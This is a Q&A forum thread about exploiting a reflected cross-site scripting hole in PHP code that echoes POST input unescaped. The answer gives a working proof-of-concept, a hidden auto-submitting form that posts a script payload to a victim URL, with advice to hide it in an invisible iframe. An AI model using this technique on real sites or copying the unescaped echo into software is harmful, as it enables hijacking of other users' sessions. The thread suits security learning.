Home/ Questions/Q 3433816
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-18T07:37:21+00:00

Examine this example. It is in PHP, but you should be able to pick

  • 0

Examine this example. It is in PHP, but you should be able to pick up what is happening if you don’t know PHP.

echo 'You searched for "' . $_GET['q'] . '"';

Now, obviously, this is a bad idea, if I request…

http://www.example.com/?q=<script type="text/javascript">alert('xss');</script>

OK, now I change that GET to a POST…

echo 'You searched for "' . $_POST['q'] . '"';

Now the query string in the URL won’t work.

I know I can’t use AJAX to post there, because of same domain policy. If I can run JavaScript on the domain, then it already has security problems.

One thing I thought of is coming across a site that is vulnerable to XSS, and adding a form which posts to the target site that submits on load (or, of course, redirecting people to your website which does this). This seems to get into CSRF territory.

So, what are the ways of exploiting the second example (using POST)?

Thanks

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Here is an xss exploit for your vulnerable code. As you have aluded to, this is an identical attack pattern to POST based CSRF. In this case i am building the POST request as a form, and then I call .submit() on the form at the very bottom. In order to call submit, there must be a submit type in the form. The post request will immediately execute and the page will redirect, it is best to run post based csrf of exploits in an invisible iframe. 

    <html>
    <form id=1 method="post" action="http://victim/vuln.php">
        <input type=hidden name="q" value="<script>alert(/xss/)</script>">
        <input type="submit">
    </form>
</html>
<script>
    document.getElementById(1).submit();//remote root command execution!
</script>

    I also recommended reading about the sammy worm and feel free to ask any questions about other exploits I have written.

    • 0